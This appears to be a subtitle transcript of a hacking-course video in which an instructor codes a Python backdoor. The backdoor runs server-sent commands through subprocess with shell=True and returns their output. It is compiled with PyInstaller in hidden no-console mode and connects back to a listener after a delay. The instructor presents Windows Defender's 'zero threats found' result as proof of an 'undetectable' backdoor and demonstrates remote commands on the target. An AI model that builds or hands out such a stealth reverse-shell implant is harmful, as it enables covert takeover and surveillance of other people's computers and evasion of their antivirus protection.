1
00:00:00,840 --> 00:00:01,710
Instructor: Welcome back.

2
00:00:01,710 --> 00:00:04,920
Time to write the code that will execute our commands

3
00:00:04,920 --> 00:00:06,780
inside of our payload.

4
00:00:06,780 --> 00:00:08,189
So as I already mentioned

5
00:00:08,189 --> 00:00:11,580
for this we're going to need an additional library.

6
00:00:11,580 --> 00:00:15,170
So go to your backdoor program and import subprocess.

7
00:00:16,110 --> 00:00:19,350
This library will allow us to execute any command

8
00:00:19,350 --> 00:00:21,030
that the server sends.

9
00:00:21,030 --> 00:00:22,620
Let's go down here,

10
00:00:22,620 --> 00:00:26,040
where we added the comment for the command execution.

11
00:00:26,040 --> 00:00:27,630
We can delete it right now,

12
00:00:27,630 --> 00:00:31,740
and to execute the command we can do something like this.

13
00:00:31,740 --> 00:00:34,500
We can initiate execute

14
00:00:34,500 --> 00:00:38,010
and we are going to equal that to the sub process.Popen

15
00:00:40,697 --> 00:00:43,020
and this stands for process Open.

16
00:00:43,020 --> 00:00:45,180
This process open takes a few parameters

17
00:00:45,180 --> 00:00:48,960
and the first one will be what we want to execute.

18
00:00:48,960 --> 00:00:53,430
In our case, we want to execute our command.

19
00:00:53,430 --> 00:00:57,010
The second parameter we can select to be shell equals true

20
00:00:58,770 --> 00:01:00,690
and there are some additional parameters

21
00:01:00,690 --> 00:01:04,980
such as stdout equals subprocess.pipe.

22
00:01:04,980 --> 00:01:06,780
And make sure that you type this pipe

23
00:01:06,780 --> 00:01:08,103
in the capital letters.

24
00:01:09,240 --> 00:01:14,240
Another parameter stderr equals subprocess.PIPE

25
00:01:15,690 --> 00:01:19,980
and the last one will be stdin equals subprocess.pipe.

26
00:01:23,160 --> 00:01:24,600
These are all the parameters

27
00:01:24,600 --> 00:01:26,790
that we need to specify right here.

28
00:01:26,790 --> 00:01:28,200
The most important one is

29
00:01:28,200 --> 00:01:32,460
that you specify this command as a first argument.

30
00:01:32,460 --> 00:01:35,580
Once we initiate the process open onto the execute

31
00:01:35,580 --> 00:01:38,790
we can create a variable called result

32
00:01:38,790 --> 00:01:43,650
that will be equal to executestdout.read.

33
00:01:43,650 --> 00:01:45,570
So we want to read the output.

34
00:01:45,570 --> 00:01:50,310
We're also going to con at to this the execute stderr.read.

35
00:01:52,530 --> 00:01:53,820
So these are the two things

36
00:01:53,820 --> 00:01:56,520
that will give us an output of the command.

37
00:01:56,520 --> 00:01:59,490
Then we will store them inside of the result variable.

38
00:01:59,490 --> 00:02:03,870
And this line that I'm going to write right now

39
00:02:03,870 --> 00:02:05,370
could be a little bit tricky.

40
00:02:05,370 --> 00:02:06,960
Let me write it first.

41
00:02:06,960 --> 00:02:09,840
Result.decode.

42
00:02:09,840 --> 00:02:12,390
You might be wondering why are we decoding this?

43
00:02:12,390 --> 00:02:17,390
Well, if I go up here in the reliable send

44
00:02:17,817 --> 00:02:19,860
we are going to encode our data

45
00:02:19,860 --> 00:02:22,470
and this result is something that we're going to send

46
00:02:22,470 --> 00:02:24,030
in the next line.

47
00:02:24,030 --> 00:02:26,520
And once we perform these two lines

48
00:02:26,520 --> 00:02:29,040
we already get an encoded data.

49
00:02:29,040 --> 00:02:31,500
So if we don't decode it first

50
00:02:31,500 --> 00:02:34,050
and we try to send it straight away,

51
00:02:34,050 --> 00:02:35,730
it'll throw us an error.

52
00:02:35,730 --> 00:02:37,140
It'll not be able to do that

53
00:02:37,140 --> 00:02:40,950
because it is going to try to encode an encoded data.

54
00:02:40,950 --> 00:02:43,830
That's why first we must decode it right here,

55
00:02:43,830 --> 00:02:48,690
and then in the next line we're going to type reliable_send

56
00:02:48,690 --> 00:02:51,810
and we are going to send our result.

57
00:02:51,810 --> 00:02:55,440
Great, now that we did this let us test our program.

58
00:02:55,440 --> 00:02:57,090
And to test this program,

59
00:02:57,090 --> 00:03:00,450
you're going to need a Windows environment to compile it

60
00:03:00,450 --> 00:03:03,810
and you are going to need any version of Python 3.

61
00:03:03,810 --> 00:03:07,500
Now in my case, I'm using Python 3.7

62
00:03:07,500 --> 00:03:09,450
so I would advise you to use the same version.

63
00:03:09,450 --> 00:03:13,320
So just download the Python 3.7 because if it works for me

64
00:03:13,320 --> 00:03:15,393
it'll most likely work for you.

65
00:03:16,260 --> 00:03:17,430
After you do that,

66
00:03:17,430 --> 00:03:22,430
what we must do is we must copy our back door

67
00:03:22,500 --> 00:03:24,570
to our Windows 10 machine.

68
00:03:24,570 --> 00:03:27,840
Why? Well we're going to compile it on a Windows machine

69
00:03:27,840 --> 00:03:30,120
For this you can use a Windows virtual machine

70
00:03:30,120 --> 00:03:33,180
if you'd like, just make sure you download Python 3.7

71
00:03:33,180 --> 00:03:35,100
onto that Windows virtual machine.

72
00:03:35,100 --> 00:03:38,040
Once you do that, you can copy the back door

73
00:03:38,040 --> 00:03:41,280
I am first going to copy to my Kali Linux desktop.

74
00:03:41,280 --> 00:03:43,320
So home Mr. Hacker and the desktop.

75
00:03:43,320 --> 00:03:46,030
And from the desktop I'm going to copy it

76
00:03:47,700 --> 00:03:51,660
onto the Windows 10 desktop.

77
00:03:51,660 --> 00:03:52,650
Great.

78
00:03:52,650 --> 00:03:55,530
Now that we copied it, we're going to need a few things

79
00:03:55,530 --> 00:03:57,510
in order to compile this program.

80
00:03:57,510 --> 00:03:58,380
So first of all,

81
00:03:58,380 --> 00:04:00,960
open your command prompt on your Windows machine

82
00:04:00,960 --> 00:04:05,850
navigate to the directory where your backdoor is

83
00:04:05,850 --> 00:04:07,710
and to compile this program,

84
00:04:07,710 --> 00:04:10,710
we are going to need a PyInstaller library.

85
00:04:10,710 --> 00:04:14,640
You can install that library using PIP as usual.

86
00:04:14,640 --> 00:04:16,589
Once you get the Pyinstall library

87
00:04:16,589 --> 00:04:18,959
you want to go to the directory where your back door is

88
00:04:18,959 --> 00:04:20,702
and type pyinstaller.

89
00:04:21,600 --> 00:04:24,840
Then the name of the program in my case backdoor.py

90
00:04:24,840 --> 00:04:27,390
and we're going to use two different arguments.

91
00:04:27,390 --> 00:04:31,143
One of them is onefile and the other one is noconsole.

92
00:04:32,970 --> 00:04:35,710
Once specify all of this, press enter

93
00:04:36,900 --> 00:04:41,250
and this will compile our Python program for us.

94
00:04:41,250 --> 00:04:42,769
Now one thing to keep in mind is

95
00:04:42,769 --> 00:04:45,090
that you must have all the libraries

96
00:04:45,090 --> 00:04:48,060
from this program installed using PIP

97
00:04:48,060 --> 00:04:51,660
in order for the compiling of the program to be successful.

98
00:04:51,660 --> 00:04:54,660
So in this case, our back door right here

99
00:04:54,660 --> 00:04:57,550
if I edit it using Notepad

100
00:04:59,310 --> 00:05:01,620
we only have these three libraries

101
00:05:01,620 --> 00:05:04,200
and all of them are already by defaulting Python.

102
00:05:04,200 --> 00:05:07,320
So there is no libraries that we must install yet.

103
00:05:07,320 --> 00:05:10,890
But in future, if you keep adding onto this program

104
00:05:10,890 --> 00:05:12,300
and you add additional libraries

105
00:05:12,300 --> 00:05:15,570
that might not be by default installed in Python

106
00:05:15,570 --> 00:05:18,270
you will need to install them first using PIP

107
00:05:18,270 --> 00:05:21,540
and then you can compile the program successfully.

108
00:05:21,540 --> 00:05:22,440
Okay, great.

109
00:05:22,440 --> 00:05:24,570
Now that we compiled the program

110
00:05:24,570 --> 00:05:27,840
we're going to have these four folders.

111
00:05:27,840 --> 00:05:31,620
We're going to have the dist folder, this pycache folder

112
00:05:31,620 --> 00:05:35,520
this backdoor.spec file and the build folder

113
00:05:35,520 --> 00:05:38,790
these three right here, you can delete straight away.

114
00:05:38,790 --> 00:05:39,870
We don't need them.

115
00:05:39,870 --> 00:05:44,010
And this, dist folder will have our executable.

116
00:05:44,010 --> 00:05:44,970
Here it is.

117
00:05:44,970 --> 00:05:46,533
It is called Backdoor.exe.

118
00:05:47,490 --> 00:05:49,110
And you know what is the cool part?

119
00:05:49,110 --> 00:05:53,980
If I scan it using the latest version of Windows Defender

120
00:06:00,390 --> 00:06:01,410
here it is.

121
00:06:01,410 --> 00:06:03,300
Zero threats found.

122
00:06:03,300 --> 00:06:07,230
So we created an undetectable back door that we coded.

123
00:06:07,230 --> 00:06:08,610
Amazing, right?

124
00:06:08,610 --> 00:06:10,980
Now to test it to see whether it works.

125
00:06:10,980 --> 00:06:12,750
First thing that we must make sure is

126
00:06:12,750 --> 00:06:15,900
that the IP addresses and the ports are set correctly

127
00:06:15,900 --> 00:06:17,940
and that is something that we should have done

128
00:06:17,940 --> 00:06:19,980
before actually compiling the program.

129
00:06:19,980 --> 00:06:21,690
But in my case, I remember

130
00:06:21,690 --> 00:06:24,600
that I said the 192.168.1.12

131
00:06:24,600 --> 00:06:26,730
to be the IP address of Kali Linux machine

132
00:06:26,730 --> 00:06:30,420
and the port 5555 to be the port to connect to,

133
00:06:30,420 --> 00:06:32,040
which is in my case, correct.

134
00:06:32,040 --> 00:06:33,480
So what I'm going to do,

135
00:06:33,480 --> 00:06:37,380
is I'm going to use Python 3 to start my server.

136
00:06:37,380 --> 00:06:41,220
It'll print out listening for the incoming connections

137
00:06:41,220 --> 00:06:44,650
and if I go right here, execute the backdoor.exe

138
00:06:47,160 --> 00:06:49,560
nothing seems to be happening, but that is good.

139
00:06:49,560 --> 00:06:52,380
We don't want our program to open anything

140
00:06:52,380 --> 00:06:56,160
but if we go back to here and we wait a couple of seconds

141
00:06:56,160 --> 00:06:59,340
because remember that we set time.sleep command

142
00:06:59,340 --> 00:07:02,280
to be 20 seconds before actually connecting

143
00:07:02,280 --> 00:07:06,810
to our Kali Linux machine, and after 20 seconds here it is

144
00:07:06,810 --> 00:07:09,930
we get the shell from our Windows 10 machine.

145
00:07:09,930 --> 00:07:12,780
we get Shell written, and then the IP address

146
00:07:12,780 --> 00:07:14,250
as well as the port

147
00:07:14,250 --> 00:07:16,800
from which the connection is coming from.

148
00:07:16,800 --> 00:07:20,700
Now if we try to execute some of the command prompt commands

149
00:07:20,700 --> 00:07:23,940
such as for example, whoamI It seems to be stuck.

150
00:07:23,940 --> 00:07:26,700
so there is something wrong with our code.

151
00:07:26,700 --> 00:07:29,730
Let us go and check our server first

152
00:07:29,730 --> 00:07:31,560
to see whether everything is good.

153
00:07:31,560 --> 00:07:35,250
So we got our reliable send and reliable receive functions.

154
00:07:35,250 --> 00:07:36,783
Everything seems to be good,

155
00:07:37,800 --> 00:07:40,980
but right here we reliable receive the result

156
00:07:40,980 --> 00:07:42,630
and then we print it out.

157
00:07:42,630 --> 00:07:44,343
So this could be the problem.

158
00:07:45,780 --> 00:07:49,530
Let's check it out inside of our backdoor code as well

159
00:07:49,530 --> 00:07:52,443
just to make sure that everything is good here.

160
00:07:54,660 --> 00:07:57,000
And after a few minutes of searching

161
00:07:57,000 --> 00:07:58,380
I managed to find the error.

162
00:07:58,380 --> 00:08:01,890
So the error was inside of the backdoor code.

163
00:08:01,890 --> 00:08:03,720
The first thing that I didn't do is

164
00:08:03,720 --> 00:08:06,000
I didn't import this json library

165
00:08:06,000 --> 00:08:07,680
inside of my backdoor code.

166
00:08:07,680 --> 00:08:11,160
I only copied these two functions from the server code

167
00:08:11,160 --> 00:08:14,010
but I forgot to import the json Library.

168
00:08:14,010 --> 00:08:15,810
So that is the first thing that we must do.

169
00:08:15,810 --> 00:08:17,370
I already did it right here.

170
00:08:17,370 --> 00:08:22,080
And the second thing is the typo right here in this line

171
00:08:22,080 --> 00:08:27,000
we typed rstip and it should be rstrip.

172
00:08:27,000 --> 00:08:32,000
We need to fix that both here and inside of the server code.

173
00:08:33,570 --> 00:08:38,570
So go down here and change the rstip into r and then strip.

174
00:08:39,659 --> 00:08:41,403
Save right here as well.

175
00:08:42,299 --> 00:08:46,470
And we are going to copy the backdoor.py

176
00:08:46,470 --> 00:08:48,990
to the home mrhacker and then desktop.

177
00:08:48,990 --> 00:08:51,750
So we're going to recompile it once again.

178
00:08:51,750 --> 00:08:54,420
All of these things we do not need anymore

179
00:08:54,420 --> 00:08:56,310
so I'm to delete them.

180
00:08:56,310 --> 00:08:57,540
If it tells you right this

181
00:08:57,540 --> 00:09:01,350
that the file is currently in use, that is because we run it

182
00:09:01,350 --> 00:09:05,130
and to close it, we can go to task manager

183
00:09:05,130 --> 00:09:07,740
find the backdoor.exe that is running

184
00:09:07,740 --> 00:09:10,860
and close it inside of our task manager.

185
00:09:10,860 --> 00:09:14,250
Then we should be able to delete the dist folder.

186
00:09:14,250 --> 00:09:15,083
Great.

187
00:09:15,083 --> 00:09:17,520
Now that we did that, what I'm going to do is

188
00:09:17,520 --> 00:09:22,520
I'm going to once again copy the backdoor.py onto my desktop

189
00:09:23,490 --> 00:09:25,200
and I'm going to compile it once again

190
00:09:25,200 --> 00:09:26,520
using the command prompt.

191
00:09:26,520 --> 00:09:31,503
So pyinstaller backdoor.py--onefile--noconsole.

192
00:09:33,060 --> 00:09:33,993
Press enter.

193
00:09:36,420 --> 00:09:39,780
While this compiling, let us go to our Kali Linux machine

194
00:09:39,780 --> 00:09:44,610
and let us start our server, python 3 server.py.

195
00:09:44,610 --> 00:09:46,560
It will listen for the incoming connections

196
00:09:46,560 --> 00:09:47,820
and right here we can go

197
00:09:47,820 --> 00:09:51,453
to the dist directory and execute backdoor.exe.

198
00:09:53,520 --> 00:09:56,220
Once again, these other files we do not need.

199
00:09:56,220 --> 00:09:57,510
So you can delete them.

200
00:09:57,510 --> 00:09:59,943
Only leave this directory with the backdoor.exe.

201
00:10:01,380 --> 00:10:02,910
And in just a few seconds,

202
00:10:02,910 --> 00:10:04,320
we should receive the connection

203
00:10:04,320 --> 00:10:06,570
right here in our Kali Linux machine

204
00:10:06,570 --> 00:10:08,400
due to the timeout of 20 seconds

205
00:10:08,400 --> 00:10:10,320
that we coded inside of our program.

206
00:10:10,320 --> 00:10:14,340
And if I type, whoamI right now it works.

207
00:10:14,340 --> 00:10:16,680
I can execute commands on the target machine.

208
00:10:16,680 --> 00:10:18,870
If I type DIR, it will tell me

209
00:10:18,870 --> 00:10:22,260
that the only file in the directory is backdoor.exe.

210
00:10:22,260 --> 00:10:24,390
And that is because we are currently inside

211
00:10:24,390 --> 00:10:26,580
of this dist directory.

212
00:10:26,580 --> 00:10:31,290
If I type IP config, it'll tell me my IP address.

213
00:10:31,290 --> 00:10:35,370
I can type the netstat command to get the netstat output

214
00:10:35,370 --> 00:10:37,680
for it'll tell me all of my current connections

215
00:10:37,680 --> 00:10:39,570
on that target machine.

216
00:10:39,570 --> 00:10:43,380
But if I, for example, tried to go one step back

217
00:10:43,380 --> 00:10:45,150
this will not work.

218
00:10:45,150 --> 00:10:47,850
I will still be in the dist directory.

219
00:10:47,850 --> 00:10:50,130
So it seems that our program works

220
00:10:50,130 --> 00:10:53,130
we can execute the commands, but for now we can't seem to

221
00:10:53,130 --> 00:10:56,220
change the directories into a different directory

222
00:10:56,220 --> 00:10:58,860
and that is something that we must see how to fix

223
00:10:58,860 --> 00:11:00,660
in the next video.

224
00:11:00,660 --> 00:11:02,820
But for now, it is good that it works.

225
00:11:02,820 --> 00:11:05,550
We saw how we can compile the program to exe

226
00:11:05,550 --> 00:11:06,870
using pyinstaller.

227
00:11:06,870 --> 00:11:11,758
So once again, just install Python 3.7 on a Windows machine

228
00:11:11,758 --> 00:11:15,150
install pyinstaller for the Python

229
00:11:15,150 --> 00:11:16,839
and install all the libraries

230
00:11:16,839 --> 00:11:19,260
that you're using inside of your program.

231
00:11:19,260 --> 00:11:21,960
In our case, we are not using any additional libraries

232
00:11:21,960 --> 00:11:23,700
outside of the standard Python libraries

233
00:11:23,700 --> 00:11:25,350
so we didn't need to do that.

234
00:11:25,350 --> 00:11:28,347
Only thing we needed to do is to install pyinstaller

235
00:11:28,347 --> 00:11:29,891
and then use the command,

236
00:11:29,891 --> 00:11:34,891
pyinstaller program name, onefile and noconsole as options.

237
00:11:35,250 --> 00:11:38,160
And this should compile the program for you.

238
00:11:38,160 --> 00:11:40,560
Once you execute it, it should connect to the server

239
00:11:40,560 --> 00:11:42,660
that we are running from our Kali Linux machine

240
00:11:42,660 --> 00:11:45,660
and let us test the quit command if I press enter,

241
00:11:45,660 --> 00:11:48,270
it closes the program right here in our terminal

242
00:11:48,270 --> 00:11:51,270
but does it also close the program in task manager?

243
00:11:51,270 --> 00:11:52,413
Let us check it out.

244
00:11:54,660 --> 00:11:56,190
And it indeed does.

245
00:11:56,190 --> 00:11:58,320
So we also closed the program

246
00:11:58,320 --> 00:12:01,350
on the target machine with the quit command.

247
00:12:01,350 --> 00:12:02,183
Great.

248
00:12:02,183 --> 00:12:03,870
In the next video we're going to see how

249
00:12:03,870 --> 00:12:07,083
we can successfully change directories using our program.